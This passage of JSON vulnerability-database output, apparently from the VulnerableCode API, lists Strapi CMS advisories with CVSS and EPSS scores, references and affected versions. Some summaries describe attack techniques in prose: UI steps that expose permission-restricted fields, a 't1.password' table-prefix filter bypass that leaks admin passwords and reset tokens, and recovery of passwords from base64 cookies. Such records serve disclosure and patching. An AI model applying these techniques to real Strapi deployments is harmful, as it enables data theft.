"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/183045" }, { "reference_url": "https://github.com/strapi/strapi", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi" }, { "reference_url": "https://github.com/strapi/strapi/pull/6599", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi/pull/6599" }, { "reference_url": "https://github.com/strapi/strapi/releases/tag/v3.0.2", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi/releases/tag/v3.0.2" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13961", "reference_id": "CVE-2020-13961", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13961" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/77543?format=api", "purl": "pkg:npm/strapi@3.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-17bb-9xte-jbeg" }, { "vulnerability": "VCID-1j5t-31jf-aucc" }, { "vulnerability": "VCID-1nkk-pvsd-x7dn" }, { "vulnerability": "VCID-5bpn-j31w-k7gb" }, { "vulnerability": "VCID-5n69-472h-rbcn" }, { "vulnerability": "VCID-adab-ztym-ayhd" }, { "vulnerability": "VCID-ax22-q11r-7kgc" }, { "vulnerability": "VCID-byez-u4kv-7qac" }, { "vulnerability": "VCID-dxss-at1b-vkaq" }, { "vulnerability": "VCID-g1c3-eb5k-sfgn" }, { "vulnerability": "VCID-kzmr-p64p-fycf" }, { "vulnerability": "VCID-mffu-ck9j-vkg8" }, { "vulnerability": "VCID-n7t6-zk51-afc3" }, { "vulnerability": "VCID-qcu6-ntuc-byea" }, { "vulnerability": "VCID-r9jw-pgw5-guh5" }, { "vulnerability": "VCID-v79g-np4c-kygh" }, { "vulnerability": "VCID-yafu-6e7s-y3cw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/strapi@3.0.2" } ], "aliases": [ "CVE-2020-13961", "GHSA-65wv-528r-m892" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gkb4-ad7n-byd5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/53728?format=api", "vulnerability_id": "VCID-kzmr-p64p-fycf", "summary": "Incorrect Default Permissions\nIn Strapi, there is no `admin::hasPermissions` restriction for CTB (aka content-type-builder) routes.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27665", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00292", "scoring_system": "epss", "scoring_elements": "0.52911", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00292", "scoring_system": "epss", "scoring_elements": "0.52851", "published_at": "2026-06-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27665" }, { "reference_url": "https://github.com/strapi/strapi/commit/3cdd73987950d5c7976701047b38203e902007bb", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi/commit/3cdd73987950d5c7976701047b38203e902007bb" }, { "reference_url": "https://github.com/strapi/strapi/pull/8439", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi/pull/8439" }, { "reference_url": "https://github.com/strapi/strapi/releases/tag/v3.2.5", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi/releases/tag/v3.2.5" }, { "reference_url": "https://snyk.io/vuln/SNYK-JS-STRAPIPLUGINCONTENTTYPEBUILDER-1021616", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://snyk.io/vuln/SNYK-JS-STRAPIPLUGINCONTENTTYPEBUILDER-1021616" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27665", "reference_id": "CVE-2020-27665", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27665" }, { "reference_url": "https://github.com/advisories/GHSA-4p55-xj37-fx7g", "reference_id": "GHSA-4p55-xj37-fx7g", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4p55-xj37-fx7g" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/78980?format=api", "purl": "pkg:npm/strapi@3.2.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-17bb-9xte-jbeg" }, { "vulnerability": "VCID-1j5t-31jf-aucc" }, { "vulnerability": "VCID-1nkk-pvsd-x7dn" }, { "vulnerability": "VCID-5bpn-j31w-k7gb" }, { "vulnerability": "VCID-5n69-472h-rbcn" }, { "vulnerability": "VCID-6tkp-v5jw-dke9" }, { "vulnerability": "VCID-adab-ztym-ayhd" }, { "vulnerability": "VCID-ax22-q11r-7kgc" }, { "vulnerability": "VCID-byez-u4kv-7qac" }, { "vulnerability": "VCID-dxss-at1b-vkaq" }, { "vulnerability": "VCID-g1c3-eb5k-sfgn" }, { "vulnerability": "VCID-mffu-ck9j-vkg8" }, { "vulnerability": "VCID-n7t6-zk51-afc3" }, { "vulnerability": "VCID-qcu6-ntuc-byea" }, { "vulnerability": "VCID-v79g-np4c-kygh" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/strapi@3.2.5" } ], "aliases": [ "CVE-2020-27665", "GHSA-4p55-xj37-fx7g" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-kzmr-p64p-fycf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/45712?format=api", "vulnerability_id": "VCID-mffu-ck9j-vkg8", "summary": "Exposure of Sensitive Information to an Unauthorized Actor\nStrapi is an open-source headless content management system. Prior to version 4.10.8, it is possible to leak private fields if one is using the `t(number)` prefix. Knex query allows users to change the default prefix. For example, if someone changes the prefix to be the same as it was before or to another table they want to query, the query changes from `password` to `t1.password`. `password` is protected by filtering protections but `t1.password` is not protected. This can lead to filtering attacks on everything related to the object again, including admin passwords and reset-tokens. Version 4.10.8 fixes this issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-34235", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.03179", "scoring_system": "epss", "scoring_elements": "0.87219", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-34235" }, { "reference_url": "https://github.com/strapi/strapi", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi" }, { "reference_url": "https://github.com/strapi/strapi/releases/tag/v4.10.8", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-10-03T20:02:03Z/" } ], "url": "https://github.com/strapi/strapi/releases/tag/v4.10.8" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34235", "reference_id": "CVE-2023-34235", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34235" }, { "reference_url": "https://github.com/advisories/GHSA-9xg4-3qfm-9w8f", "reference_id": "GHSA-9xg4-3qfm-9w8f", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-9xg4-3qfm-9w8f" }, { "reference_url": "https://github.com/strapi/strapi/security/advisories/GHSA-9xg4-3qfm-9w8f", "reference_id": "GHSA-9xg4-3qfm-9w8f", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-10-03T20:02:03Z/" } ], "url": "https://github.com/strapi/strapi/security/advisories/GHSA-9xg4-3qfm-9w8f" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/66262?format=api", "purl": "pkg:npm/strapi@4.10.8", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/strapi@4.10.8" } ], "aliases": [ "CVE-2023-34235", "GHSA-9xg4-3qfm-9w8f" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mffu-ck9j-vkg8" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46010?format=api", "vulnerability_id": "VCID-n7t6-zk51-afc3", "summary": "Strapi's field level permissions not being respected in relationship title\n### Summary\nField level permissions not being respected in relationship title.\nIf I have a relationship title and the relationship shows a field I don't have permission to see I will still be visible.\n\n### Details\nNo RBAC checks on on the relationship the relation endpoint returns\n\n### PoC\n#### Setup\nCreate a fresh strapi instance\nCreate a new content type\nin the newly created content type add a relation to the users-permissions user.\nSave.\nCreate a users-permissions user\nUse your created content type and create an entry in it related to the users-permisisons user\n\nGo to settings -> Admin panel -> Roles -> Author\nGive the author role full permissions on the content type your created.\nMake sure they don't have any permission to see User\nSave\n\nCreate a new admin account with only the author role\n#### CVE\nlogin on the newly created author acount.\ngo to the content manager to the colection type you created with the relationship to users_permissions_user\nYou now see a field you don't have permissions to view.\n\n### Impact\nRBAC field level checks leaks data selected by the admin user as relationship title\nWhat could be sensitive fields that they should not be allowed to see. by the person having this specific role.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-37263", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00094", "scoring_system": "epss", "scoring_elements": "0.26205", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-37263" }, { "reference_url": "https://github.com/strapi/strapi", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi" }, { "reference_url": "https://github.com/strapi/strapi/releases/tag/v4.12.1", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-25T14:58:02Z/" } ], "url": "https://github.com/strapi/strapi/releases/tag/v4.12.1" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37263", "reference_id": "CVE-2023-37263", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37263" }, { "reference_url": "https://github.com/advisories/GHSA-m284-85mf-cgrc", "reference_id": "GHSA-m284-85mf-cgrc", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-m284-85mf-cgrc" }, { "reference_url": "https://github.com/strapi/strapi/security/advisories/GHSA-m284-85mf-cgrc", "reference_id": "GHSA-m284-85mf-cgrc", "reference_type": "", "scores": [ { "value": "6.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-25T14:58:02Z/" } ], "url": "https://github.com/strapi/strapi/security/advisories/GHSA-m284-85mf-cgrc" } ], "fixed_packages": [], "aliases": [ "CVE-2023-37263", "GHSA-m284-85mf-cgrc" ], "risk_score": null, "exploitability": null, "weighted_severity": null, "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-n7t6-zk51-afc3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/43244?format=api", "vulnerability_id": "VCID-qcu6-ntuc-byea", "summary": "Insecure Storage of Sensitive Information\nStoring passwords in a recoverable format in the DOCUMENTATION plugin component of Strapi allows an attacker to access a victim's HTTP request, get the victim's cookie, perform a base64 decode on the victim's cookie, and obtain a cleartext password, leading to getting API documentation for further API attacks.", "references": [ { "reference_url": "http://packetstormsecurity.com/files/166915/Strapi-3.6.8-Password-Disclosure-Insecure-Handling.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "http://packetstormsecurity.com/files/166915/Strapi-3.6.8-Password-Disclosure-Insecure-Handling.html" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-46440", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.03089", "scoring_system": "epss", "scoring_elements": "0.87049", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.03089", "scoring_system": "epss", "scoring_elements": "0.87027", "published_at": "2026-06-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-46440" }, { "reference_url": "https://github.com/strapi/strapi", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi" }, { "reference_url": "https://github.com/strapi/strapi/pull/12246", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi/pull/12246" }, { "reference_url": "https://hub.docker.com/r/strapi/strapi", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://hub.docker.com/r/strapi/strapi" }, { "reference_url": "https://strapi.io", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://strapi.io" }, { "reference_url": "https://strapi.io/", "reference_id": "", "reference_type": "", "scores": [], "url": "https://strapi.io/" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-46440", "reference_id": "CVE-2021-46440", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-46440" }, { "reference_url": "https://github.com/advisories/GHSA-85vg-grr5-pw42", "reference_id": "GHSA-85vg-grr5-pw42", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-85vg-grr5-pw42" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/61933?format=api", "purl": "pkg:npm/strapi@3.6.9", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-17bb-9xte-jbeg" }, { "vulnerability": "VCID-1j5t-31jf-aucc" }, { "vulnerability": "VCID-1nkk-pvsd-x7dn" }, { "vulnerability": "VCID-5bpn-j31w-k7gb" }, { "vulnerability": "VCID-5n69-472h-rbcn" }, { "vulnerability": "VCID-6tkp-v5jw-dke9" }, { "vulnerability": "VCID-adab-ztym-ayhd" }, { "vulnerability": "VCID-byez-u4kv-7qac" }, { "vulnerability": "VCID-dxss-at1b-vkaq" }, { "vulnerability": "VCID-g1c3-eb5k-sfgn" }, { "vulnerability": "VCID-mffu-ck9j-vkg8" }, { "vulnerability": "VCID-n7t6-zk51-afc3" }, { "vulnerability": "VCID-v79g-np4c-kygh" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/strapi@3.6.9" }, { "url": "http://public2.vulnerablecode.io/api/packages/61355?format=api", "purl": "pkg:npm/strapi@4.1.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-jvwy-9dk1-ukd7" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/strapi@4.1.5" } ], "aliases": [ "CVE-2021-46440", "GHSA-85vg-grr5-pw42" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qcu6-ntuc-byea" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/53730?format=api", "vulnerability_id": "VCID-r9jw-pgw5-guh5", "summary": "Improper Input Validation\n`admin/src/containers/InputModalStepperProvider/index.js` in Strapi has unwanted `/proxy?url=` functionality.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27664", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.01344", "scoring_system": "epss", "scoring_elements": "0.80375", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.01344", "scoring_system": "epss", "scoring_elements": "0.804", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27664" }, { "reference_url": "https://github.com/strapi/strapi/pull/8442", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi/pull/8442" }, { "reference_url": "https://github.com/strapi/strapi/releases/tag/v3.2.5", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi/releases/tag/v3.2.5" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27664", "reference_id": "CVE-2020-27664", "reference_type": "", "scores": [ { "value": "9.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27664" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/78980?format=api", "purl": "pkg:npm/strapi@3.2.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-17bb-9xte-jbeg" }, { "vulnerability": "VCID-1j5t-31jf-aucc" }, { "vulnerability": "VCID-1nkk-pvsd-x7dn" }, { "vulnerability": "VCID-5bpn-j31w-k7gb" }, { "vulnerability": "VCID-5n69-472h-rbcn" }, { "vulnerability": "VCID-6tkp-v5jw-dke9" }, { "vulnerability": "VCID-adab-ztym-ayhd" }, { "vulnerability": "VCID-ax22-q11r-7kgc" }, { "vulnerability": "VCID-byez-u4kv-7qac" }, { "vulnerability": "VCID-dxss-at1b-vkaq" }, { "vulnerability": "VCID-g1c3-eb5k-sfgn" }, { "vulnerability": "VCID-mffu-ck9j-vkg8" }, { "vulnerability": "VCID-n7t6-zk51-afc3" }, { "vulnerability": "VCID-qcu6-ntuc-byea" }, { "vulnerability": "VCID-v79g-np4c-kygh" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/strapi@3.2.5" } ], "aliases": [ "CVE-2020-27664", "GHSA-7frv-9phw-vrvr" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-r9jw-pgw5-guh5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/110754?format=api", "vulnerability_id": "VCID-v79g-np4c-kygh", "summary": "Cross-site Scripting in Strapi\nStrapi v3.x.x versions and earlier contain a stored cross-site scripting vulnerability in file upload function. By exploiting this vulnerability, an arbitrary script may be executed on the web browser of the user who is logging in to the product with the administrative privilege.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2022-29894", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00476", "scoring_system": "epss", "scoring_elements": "0.65287", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00476", "scoring_system": "epss", "scoring_elements": "0.65245", "published_at": "2026-06-04T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-29894" }, { "reference_url": "https://github.com/strapi/strapi", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi" }, { "reference_url": "https://jvn.jp/en/jp/JVN44550983/index.html", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://jvn.jp/en/jp/JVN44550983/index.html" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2022-29894", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-29894" }, { "reference_url": "https://strapi.io", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://strapi.io" }, { "reference_url": "https://strapi.io/", "reference_id": "", "reference_type": "", "scores": [], "url": "https://strapi.io/" }, { "reference_url": "https://github.com/advisories/GHSA-mcqm-6ff4-53qx", "reference_id": "GHSA-mcqm-6ff4-53qx", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mcqm-6ff4-53qx" } ], "fixed_packages": [], "aliases": [ "CVE-2022-29894", "GHSA-mcqm-6ff4-53qx" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v79g-np4c-kygh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/53729?format=api", "vulnerability_id": "VCID-yafu-6e7s-y3cw", "summary": "Cross-site Scripting\nStrapi has stored XSS in the wysiwyg editor's preview feature.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27666", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00281", "scoring_system": "epss", "scoring_elements": "0.5175", "published_at": "2026-06-04T12:55:00Z" }, { "value": "0.00281", "scoring_system": "epss", "scoring_elements": "0.51809", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27666" }, { "reference_url": "https://github.com/strapi/strapi/pull/8440", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi/pull/8440" }, { "reference_url": "https://github.com/strapi/strapi/releases/tag/v3.2.5", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/strapi/strapi/releases/tag/v3.2.5" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27666", "reference_id": "CVE-2020-27666", "reference_type": "", "scores": [ { "value": "5.4", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27666" }, { "reference_url": "https://github.com/advisories/GHSA-qvp5-mm7v-4f36", "reference_id": "GHSA-qvp5-mm7v-4f36", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qvp5-mm7v-4f36" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/78980?format=api", "purl": "pkg:npm/strapi@3.2.5", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-17bb-9xte-jbeg" }, { "vulnerability": "VCID-1j5t-31jf-aucc" }, { "vulnerability": "VCID-1nkk-pvsd-x7dn" }, { "vulnerability": "VCID-5bpn-j31w-k7gb" }, { "vulnerability": "VCID-5n69-472h-rbcn" }, { "vulnerability": "VCID-6tkp-v5jw-dke9" }, { "vulnerability": "VCID-adab-ztym-ayhd" }, { "vulnerability": "VCID-ax22-q11r-7kgc" }, { "vulnerability": "VCID-byez-u4kv-7qac" }, { "vulnerability": "VCID-dxss-at1b-vkaq" }, { "vulnerability": "VCID-g1c3-eb5k-sfgn" }, { "vulnerability": 